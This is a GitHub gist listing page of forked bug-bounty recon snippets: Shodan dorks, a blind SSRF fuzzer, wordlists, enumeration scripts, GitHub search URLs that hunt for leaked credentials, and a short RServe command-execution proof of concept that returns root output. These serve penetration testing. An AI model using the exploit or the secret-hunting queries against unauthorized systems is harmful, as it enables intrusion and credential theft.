Dipak Kumar Das d1pakda5
💻
d1pakda5
/ shodanRecon
Created
July 28, 2022 19:40
— forked from ShubhamPy/shodanRecon
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| org: org_name | |
| kibana content-length:217 | |
| org:”Amazon” ssl:”target” | |
| ssl:”target” | |
| html:”Dashboard Jenkins” http.component:”jenkins” | |
| http.title:”302 Found” | |
| http.component%3A”java” | |
| https://www.shodan.io/host/ip#9200 | |
| https://www.shodan.io/host/ip | |
| X-Redirect-By: WordPress ssl:”name” |
d1pakda5
/ ssrf.sh
Last active
July 18, 2022 20:05
— forked from hussein98d/ssrf.sh
This script takes a domain name and a callback server, parses links , appends SSRF parameters and fire the requests.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d" | |
| echo "Usage: bash script.sh domain.com http://server-callbak" | |
| echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls" | |
| if [ -z "$1" ]; then | |
| echo >&2 "ERROR: Domain not set" | |
| exit 2 | |
| fi | |
| if [ -z "$2" ]; then | |
| echo >&2 "ERROR: Sever link not set" | |
| exit 2 |
d1pakda5
/ List of API endpoints & objects
Created
July 15, 2022 10:25
— forked from yassineaboukir/List of API endpoints & objects
A list of 3203 common API endpoints and objects designed for fuzzing.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |
d1pakda5
/ CommandExec-RServe-TCP-3611.py
Created
January 21, 2021 20:43
— forked from csandker/CommandExec-RServe-TCP-3611.py
Command Exec. In RServe TCP/6311
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Install pyRserve | |
| $:> pip install pyRserve | |
| $:> python3 | |
| >>> conn = pyRserve.connect('<IP>', 6311) | |
| >>> conn.eval("1+2") ## Testing the connection | |
| 3.0 | |
| >>> conn.eval('t1 <- try(system("id", intern = TRUE))') ## Command Exec | |
| 'uid=0(root) gid=0(root) groups=0(root)' | |
| >>> con.close() |
d1pakda5
/ findomain_integration.sh
Last active
August 16, 2020 16:39
— forked from Edu4rdSHL/findomain_integration.sh
Simple script to collect the info from the top enumeration tools, unify all the results in a same file, import the data to Findomain and include it in the monitoring process while saving to database.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # Simple script to collect the info from the top enumeration tools, unify all the results in a same file, import the data to Findomain and include it in the monitoring process while saving to database. | |
| # Usage: | |
| # ./findomain_integration.sh domains_file findomain_config_file - see https://www.github.com/Edu4rdSHL/findomain/tree/master/config_examples | |
| domains_file="$1" | |
| config_file="$2" | |
| total_file="all_external_subdomains.txt" | |
| external_sources() { | |
| local amass_file="amass_output.txt" |
d1pakda5
/ nuclear.sh
Created
August 14, 2020 19:08
— forked from dwisiswant0/nucleir.sh
Automate nuclei
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| nucleir() { | |
| local TPL="$HOME/Documents/nuclei-templates" | |
| [[ -z "${1}" ]] && { echo "-target/-l ?"; return; } | |
| [[ -z "${2}" ]] && { echo "Input target?"; return; } | |
| for i in `ls -1d ${TPL}/*/`; do | |
| if [[ ! "${i}" =~ (brute-force|examples|payloads) ]]; then | |
| nuclei $1 $2 -t ${i} -o "$(basename $2)_nuclei-$(basename $i).txt" | |
| fi |
d1pakda5
/ auto_git_query
Created
August 29, 2019 06:57
— forked from nullenc0de/auto_git_query
Automated Github Queries (Can open 29 tabs at a time)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code | |
| https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code | |
| https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code | |
| https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI |
d1pakda5
/ getGithubRepoCloneUrls.py
Created
July 23, 2019 19:43
— forked from pascalschulz/getGithubRepoCloneUrls.py
This code snippet takes a Github organization name as input, crawls for all its public repositories and returns a list of all the "Git clone URLs" for those repos.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import itertools | |
| import re | |
| import requests as rq | |
| # Your Github organization (e.g. /Github) | |
| organization = "/<company_name>" | |
| response = rq.request("GET", "https://github.com{0}".format(organization)) |
d1pakda5
/ all.txt
Created
June 15, 2019 18:40
— forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
d1pakda5
/ content_discovery_nullenc0de.txt
Created
June 11, 2019 07:01
— forked from nullenc0de/content_discovery_nullenc0de.txt
content_discovery_nullenc0de.txt
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| / | |
| $$$lang-translate.service.js.aspx | |
| $367-Million-Merger-Blocked.html | |
| $defaultnav | |
| ${idfwbonavigation}.xml | |
| $_news.php | |
| $search2 | |
| £º | |
| .0 |
NewerOlder